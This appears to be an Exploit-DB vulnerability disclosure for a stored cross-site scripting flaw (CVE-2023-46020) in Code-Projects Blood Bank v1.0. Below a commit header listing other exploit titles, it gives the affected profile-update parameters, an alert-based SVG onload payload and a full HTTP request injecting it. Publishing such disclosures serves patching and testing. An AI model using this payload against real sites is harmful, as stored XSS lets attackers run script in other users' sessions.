a44e138f78
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
56 lines
No EOL
2.1 KiB
Text
56 lines
No EOL
2.1 KiB
Text
# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
|
|
# Date: 2023-11-14
|
|
# Exploit Author: Ersin Erenler
|
|
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
|
|
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
|
|
# CVE : CVE-2023-46020
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
# Description:
|
|
|
|
The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
|
|
|
|
Vulnerable File: updateprofile.php
|
|
|
|
Parameters: rename, remail, rphone, rcity
|
|
|
|
# Proof of Concept:
|
|
----------------------
|
|
|
|
1. Intercept the POST request to updateprofile.php via Burp Suite
|
|
2. Inject the payload to the vulnerable parameters
|
|
3. Payload: "><svg/onload=alert(document.domain)>
|
|
4. Example request for rname parameter:
|
|
|
|
---
|
|
|
|
POST /bloodbank/file/updateprofile.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate, br
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 103
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/bloodbank/rprofile.php?id=1
|
|
Cookie: PHPSESSID=<some-cookie-value>
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
|
|
|
|
----
|
|
|
|
5. Go to the profile page and trigger the XSS
|
|
|
|
XSS Payload:
|
|
|
|
"><svg/onload=alert(document.domain)> |